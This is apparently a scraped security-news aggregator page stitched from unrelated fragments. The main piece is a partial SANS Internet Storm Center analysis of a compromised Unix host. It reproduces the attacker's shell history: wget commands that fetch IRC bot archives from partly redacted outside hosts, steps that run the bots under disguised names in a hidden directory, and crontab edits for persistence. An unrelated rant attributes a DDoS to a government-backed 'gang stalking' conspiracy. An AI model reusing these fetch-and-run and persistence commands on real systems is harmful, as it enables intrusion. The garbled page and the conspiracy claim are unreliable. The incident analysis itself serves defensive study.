Here's an overview of some of last week's most interesting news and articles:
Global analysis of 10 million web attacks
Web applications, on average, experience twenty seven attacks per hour, or…
View full post on Help Net Security – News
./run
We are not quite sure whether any of the above exploits was successful. The id command, or the exploit itself, would have told the attacker whether he got lucky, but there aren’t any traces in the shell history file that would tell us either way.
In any case .. follows Phase #3a: The attacker installs some goodies. virus.tar isn’t really a virus, it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses Nano to edit the config file, which tells us that he isn’t all that experienced on Unix. A real Unix hacker would most likely use vi, because vi is present on all Unix flavors and versions. Note also how he calls the IRC bot Evolution when he starts it, likely hoping that an admin would overlook it in a casual investigation.
/sbin/ifconfig -a | grep inet
wget http://f……com/storm12/virus.tar
tar xvf virus.tar
rm -rf virus.tar
cd virus
ls -a
nano start
nano inst
chmod +x *
./autorun
./start Evolution
Phase#3b: Install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory called (single space). If you want to search for such directories on your system, try this
#find / -name
mkdir
cd
ls -a
wget http://c…….org/egg.tgz
cd
tar zxvf egg.tgz
rm -rf egg.tgz
cd .access.log
ls -a
chmod +x *
./eggdrop -m bot1.conf
ls -a
cd scripts
nano respond.tcl
pwd
Phase #4: The attacker wants to make sure that access can be re-gained, and configures the cron tab to re-start some of his processes automatically on a schedule.
crontab -l
crontab -e
exit
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
View full post on SANS Internet Storm Center, InfoCON: green
I’m at the end of a webinar and the criminals crash the network server. This is classic DDOS and the entire false flag domestic terrorism organized crime gang stalking network campaign is UNCONSTITUTIONAL since it’s supposedly government backed by the use of military resources, technology, techniques and tactics as well as illegal, unconscionable and immoral.
Hard on the heels of warnings that critical systems in America are vulnerable to Stuxnet-style attacks, a group of security researchers says SCADA systems and PLCs make prisons vulnerable to computer-based attacks.…
View full post on The Register – Security